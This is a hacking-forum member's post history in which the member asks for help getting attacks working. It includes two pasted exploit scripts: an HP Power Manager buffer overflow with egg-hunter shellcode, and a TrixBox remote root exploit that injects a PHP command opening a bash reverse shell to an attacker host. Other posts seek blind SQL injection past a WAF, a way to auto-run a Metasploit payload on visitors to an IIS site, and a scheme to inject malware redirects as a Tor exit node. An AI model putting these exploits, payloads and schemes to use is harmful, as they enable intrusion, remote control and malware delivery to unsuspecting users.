Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - pl4f0rd

Pages: [1] 2
Hacking and Security / Blind SQL with WAF
« on: December 24, 2014, 01:53:30 pm »
Hi guys, I came across this application which is using a WAF on certain strings and has some preg_match and preg_replace functions.

Anyway I have managed to get some results although very simple, instead of the usual ' or 1=1 -- i am using the following (1)or(1)=(1) which returns 5 pictures, when i change it to (1)or(1)=(2) then I just get the one picture.

How can i increases on this and start to gather database information?  So im struggling to construct and order by or union.


Hacking and Security / Re: Help getting exploit working
« on: July 19, 2011, 07:17:40 pm »
yes, tried that, this is needed as it's the unique string for th egg hunter which has to be placed before the shellcode.  It's kind of a marker.

It's been baffling me for a few days now  :o

Hacking and Security / Help getting exploit working
« on: July 19, 2011, 06:09:26 pm »
I need to get this working on a Windows 7 box

The RET address is universal

The box is exploitable

I think it's something to do with the Egg Hunter appended "n00bn00b"

Any help would be appreciated 
Code: [Select]
import sys
from socket import *
print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__"
   HOST  = sys.argv[1]
except IndexError:
   print "Usage: %s HOST" % sys.argv[0]
PORT  = 80
RET   = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
EH ='\x33\xD2\x90\x90\x90\x42\x52\x6a'
EH +='\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
EH +='\xf4\xb8\x6e\x30\x30\x62\x8b\xfa'
EH +='\xaf\x75\xea\xaf\x75\xe7\xff\xe7'
evil =  "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"
evil += "User-Agent: %s\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Referer: http://%s/index.asp\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 678\r\n\r\n"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "\x41"*256 + RET + "\x90"*32 + EH + "\x42"*287 + "\x0d\x0a"
evil = evil % (HOST,HOST,SHELL,HOST)
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
print s.recv(1024)
print "[+] Done!"
print "[*] Check your shell at %s:4444 , can take up to 1 min to spawn your shell" % HOST

Hacking and Security / Re: Cracking wifi passwords
« on: July 15, 2011, 11:01:23 pm »
Check out my video quality is a bit shitty but should get you started. 

Great  ;D

Works like a charm


Well it's deffo running the right version, see screenshot so must be a way to get this code to work some how

So you got any ideas on how I can get the session?


Have error in below code and not sure why, Im guessing it has something to do with the def find_sessionid part.

Any help would be greatly appreciated

Error below

Code: [Select]
TypeError: cannot concatenate 'str' and 'NoneType' objects

Code: [Select]
import sys
from socket import *
import re
import os
from time import sleep
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
if (len(sys.argv)!=5):
    print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
def create_post(injection):
        buffer=("POST /user/index.php HTTP/1.1 \r\n"
        "Host: \r\n"
        "Content-Type: application/x-www-form-urlencoded \r\n"
        "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
        return buffer
def send_post(host,port,input):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    return output
def find_sessionid(http_output):
    for header in headers:
                    cook=header.split(" ")
                    print "[*] Session ID is %s" % sessionid
            return sessionid
print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
print "[*] Extracting Session ID"
print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
print "[*] Cleaning up"
print "[*] Done!"
# [2008-07-12]

.NET Framework / Re: ASP code for msfpayload
« on: July 13, 2011, 05:40:04 pm »
Cheers, I will give it a whirl

.NET Framework / Re: ASP code for msfpayload
« on: July 13, 2011, 04:50:17 pm »
Well yeah I got a shell however it's unprivileged and running as IUSR,  I uploaded the exe and to the web server and I navigate to it and manually click on the exe which in turn loads me up a shell via the multi/handler. 

The meterpreter shell times out, cant getsystem, or sysinfo or drop into a shell.

The exe is not asp it's clicked on directly in the Scripts directory and loaded as an exe.

I need an asp page that loads the exe by it's self without me clicking on it., So for example the user navigates to site and the exe is executed. 

General discussion / Re: IRC link
« on: July 13, 2011, 04:25:21 pm »
"cannot connec to host. maybe you mispelled it!"

General discussion / IRC link
« on: July 13, 2011, 04:12:27 pm »
IRC link no longer works for me.

.NET Framework / ASP code for msfpayload
« on: July 13, 2011, 03:38:39 pm »
Ive uploaded a metasploit payload to a iis webserver in the Scripts directory currently I am executing the script directly from the browser, which in turn is causing me problems.  Any one got any ideas how I can create a dummy asp page which in turn executes my payload which will run server side

Hacking and Security / Re: Hey, IM LOST
« on: March 27, 2011, 11:02:57 am »
BackTrack 5 (Unreleased at this time) is actually built off of Ubuntu ;)


Not sure if BT4 is built off of slax or ubuntu for sure.

Yeah very true, I was just thinking back to the time when I was a newbie I could never get to grips with  backtrack for some reason, I tried to immerse my self in it daily but it's just not built to be an everyday system, even BT R2 still doesn't feel finished if you know what I mean  :o Let's hope BT 5 is just like Ubuntu as that's a pretty easy to use and stable OS.

My main point really is it's better to immerse yourself daily in what you want to learn, with Ubtuntu you can do this, for example your network/wireless will show up automatically in BT it doesn't and could confuse the beginner.

Also, the BT forums are not very friendly if you require help.

Anonymity and Privacy / Re: Tor project
« on: March 27, 2011, 10:28:19 am »
Very true it is slow and leaves too many logs about  I think they are currently working on the speed issue.

On the plus side though You could be an exit node for the onion network,  this way you can see all the traffic and get up to all sorts of mischief, you could modify the traffic for your own gain, MITM attacks by injecting some java script to re direct to a malicious website to install malware.

I would recommend either a highly anonymous proxy or use ssh tunnel for proxy connections

Even better nowadays is the use of cellular connections, pretty hard to track as normally each time you connect they are dynamically assigned, of course the operator could tie the ip to you.  So if you think someone is tracking your activities just reconnect.

Pages: [1] 2

Intern0t SoldierX SecurityOverride programisiai
Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.